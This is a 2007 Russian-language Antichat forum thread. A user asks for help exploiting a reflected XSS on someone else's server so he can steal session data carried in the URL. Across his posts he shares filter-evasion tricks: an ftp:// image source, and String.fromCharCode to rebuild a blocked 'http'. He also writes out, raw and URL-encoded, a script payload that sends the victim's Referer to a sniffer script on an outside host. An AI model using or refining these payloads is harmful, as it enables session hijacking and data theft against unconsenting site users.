ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Протиснуться через пассивную Xss
  #1  
Старый 02.07.2007, 14:37
Аватар для Alexus
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
Провел на форуме:
399562

Репутация: 28
Отправить сообщение для Alexus с помощью ICQ
Question Протиснуться через пассивную Xss

Извиняюсь за возможно лёгкий вопрос заранее.
Нашёл в одном из интересующих менЯ серверов пассивную XSS, coockie сервер не использует , да они мне и ненужны , тк данные сесии идут через адресную строку get запросом в переменной $a. ХSS не имеет ограничений по количеству символов . Я решил , что если сделать в XSS так <img src=http://******> то браузер обратится к моему серверу и я получу значение refer . Но скрипт каким-то образом фильтрует слово http((( однако на ftp спокойно пустил(<img src=ftp://*****>).Я пробовал смотреть логи Golden Ftp Server , но там нет , использовал FTP сервер встроеный в Small http Server . Но там тоже этого не нашёл . Пожалуйста подскажите или какой-нибудь другой способ или ftp сервер пишущий в лог поле рефер .
 
Ответить с цитированием

  #2  
Старый 02.07.2007, 14:53
Аватар для Alexus
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
Провел на форуме:
399562

Репутация: 28
Отправить сообщение для Alexus с помощью ICQ
По умолчанию

Тег создаю сам , как я вставлю ссылку на сниффер через http если слово блокируется в переменной
-------------------
http://***.*****.ru/m/a="то что мне надо"&INi=26&v="сдесь xss"
 
Ответить с цитированием

  #3  
Старый 02.07.2007, 15:17
Аватар для Alexus
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
Провел на форуме:
399562

Репутация: 28
Отправить сообщение для Alexus с помощью ICQ
По умолчанию

Проверил , заметил , "+" тоже фильтруется (((
 
Ответить с цитированием

  #4  
Старый 02.07.2007, 15:27
Аватар для Alexus
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
Провел на форуме:
399562

Репутация: 28
Отправить сообщение для Alexus с помощью ICQ
По умолчанию

вот что у меня получается в исходном коде , он фильтрует все плюсы и везде : (уровень <script>img=new/**/Image();img.src=String.fromCharCode(6*16 8,7*16 4,7*16 4,7*16) :/*****.fatal.ru/sniff/sniffer.php;</script>)
про eval можно подробнее? xAE это в символах ASCI ?
 
Ответить с цитированием

  #5  
Старый 02.07.2007, 15:49
Аватар для Alexus
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
Провел на форуме:
399562

Репутация: 28
Отправить сообщение для Alexus с помощью ICQ
По умолчанию

%3Cscript%3Eimg%3Dnew%2F**%2FImage()%3Bimg.src%3DS tring.fromCharCode(6*16%2B8%2C7*16%2B4%2C7*16%2B4% 2C7*16)%2B'%3A%2F%2******.fatal.ru%2Fsniff%2Fsniff er.php'%3B%3C%2Fscript%3E
400 Bad Request
nginx/0.5.25
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Broken image, при использовании XSS через аватару Qwazar PHP, PERL, MySQL, JavaScript 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ